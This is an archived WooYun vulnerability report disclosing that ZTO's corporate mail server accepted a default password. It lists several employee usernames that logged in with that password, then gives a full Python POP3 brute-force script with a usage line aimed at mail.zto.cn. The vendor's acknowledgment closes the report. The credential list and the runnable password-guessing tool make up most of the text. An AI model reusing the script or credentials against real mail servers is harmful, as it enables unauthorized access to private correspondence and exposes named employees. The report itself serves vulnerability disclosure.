乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-11-26: 厂商已经确认,细节仅向厂商公开 2015-12-06: 细节向核心白帽子及相关领域专家公开 2015-12-16: 细节向普通白帽子公开 2015-12-26: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
1、
URL:http://mail.zto.cn/index.php
[+] Login successful: zhouyanan zto123456 [+] Mail: 18882 emails[+] Login successful: wangfang zto123456 [+] Mail: 212 emails[+] Login successful: liyong zto123456 [+] Mail: 9 emails[+] Login successful: liuting zto123456 [+] Mail: 44 emails[+] Login successful: xiaoqian zto123456 [+] Mail: 16 emails[+] Login successful: qiuline zto123456 [+] Mail: 109 emails[+] Login successful: liping zto123456 [+] Mail: 957 emails[+] Login successful: yeqing zto123456 [+] Mail: 273 emails[+] Login successful: wangbin zto123456 [+] Mail: 205 emails[-] Done
总结: zto123456应该是默认口令2、登录邮箱, 证明一下危害近2万封与当当、天猫的往来信息
内部通讯录
每天订单
其他敏感信息
可进一步收集数据, 进行邮箱测试
已证明测试代码, 可用于内部测试
#!usr/bin/python #!coding:utf-8 import sys,poplib if len(sys.argv) !=4 and len(sys.argv) != 5: print "\t Note: 邮箱类型为:中通 \n" print "\t Note: 用户字典不需要域名后缀,例如zhangsan\n" print "\t Usage: 使用方法:./mail.py type <userlist> <wordlist> mail.domain.com\n" sys.exit(1) server = sys.argv[4]success = [] try: users_list = open(sys.argv[2], "r") users = users_list.readlines() words_list = open(sys.argv[3], "r") words = words_list.readlines() except(IOError): print "[-] Error: please check filename\n" sys.exit(1) finally: users_list.close() words_list.close() try: pop = poplib.POP3_SSL(server,995) welcome = pop.getwelcome() print welcome pop.quit() except (poplib.error_proto): welcome = "[-] Error: No Response,Something wrong!!!\n" sys.exit(1) print "[+] Server:",server print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+] Server response:",welcome,"\n" def mailbruteforce(listuser,listpwd,type): if len(listuser) < 1 or len(listpwd) < 1 : print "[-] Error: An error occurred: No user or pass list\n" return 1 for user in listuser: for passwd in listpwd : user = user.replace("\n","") passwd = passwd.replace("\n","") try: print "-"*12 print "[+] User:",user,"Password:",passwd #time.sleep(0.5) popserver = poplib.POP3_SSL(server,995) popserver.user(user) auth = popserver.pass_(passwd) print auth if auth.split(' ')[0] == "+OK" or auth =="+OK": ret = (user,passwd,popserver.stat()[0],popserver.stat()[1]) success.append(ret) print len(success) popserver.quit() break else : popserver.quit() continue except: #print "An error occurred:", msg pass if __name__ == '__main__': mailbruteforce(users,words,sys.argv[1]) print "\t[+] have weakpass :\t",len(success) if len(success) >=1: for ret in success: print "\n\n[+] Login successful:",ret[0], ret[1] print "\t[+] Mail:",ret[2],"emails" print "\n[-] Done"
useage:
D:\Python>python mail\zto.py Winmail mail\zto.txt mail\pass\pass0.txt mail.zto.cn
代码有些地方不是很完美, 但可以用的
你们更专业!PS:SSO也有点有问题, 如果能扩大危害, 再提交吧...
危害等级:高
漏洞Rank:15
确认时间:2015-11-26 11:53
感谢白帽子的辛苦劳动,已经联系负责人处理。麻烦下次对联系方式等进行脱敏,谢谢。
暂无